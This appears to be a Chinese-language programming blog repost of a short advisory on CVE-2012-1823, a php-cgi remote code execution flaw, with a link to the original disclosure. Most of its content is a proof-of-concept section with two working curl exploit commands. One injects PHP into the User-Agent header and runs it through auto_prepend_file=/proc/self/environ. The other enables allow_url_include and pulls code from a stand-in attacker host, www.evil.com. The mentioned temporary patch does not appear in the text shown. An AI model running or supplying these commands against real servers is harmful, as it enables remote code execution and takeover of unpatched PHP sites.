且构网

分享程序员开发的那些事...
且构网 - 分享程序员编程开发的那些事
您所在的位置:首页 > CVE-2012-1823 php-cgi远程代码执行

CVE-2012-1823 php-cgi远程代码执行

更新时间:2022-09-15 19:55:09

CVE-2012-1823,php-cgi远程代码执行,FastCGI不受影响。PHP官方暂时未发布补丁,请受影响的站长按文章下方提供的方式打好临时补丁。

http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

via:knownsec

POC:

1、本地包含直接执行代码:

curl -H "USER-AGENT: <?system('id');die();?>" http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n

2、远程包含执行代码:

curl http://target.com/test.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2Fwww.evil.com%2fevil.txt

via/Gary

上一篇 : :优秀的web server Zeus Web Server zZ from baoz.net下一篇 : oracle access manager download

相关阅读

推荐文章

网站首页网站地图Copyright © 2021-2022 且购网

免责声明:本站文章部分来源于互联网,如有侵权请联系站长,我们将在72小时内删除。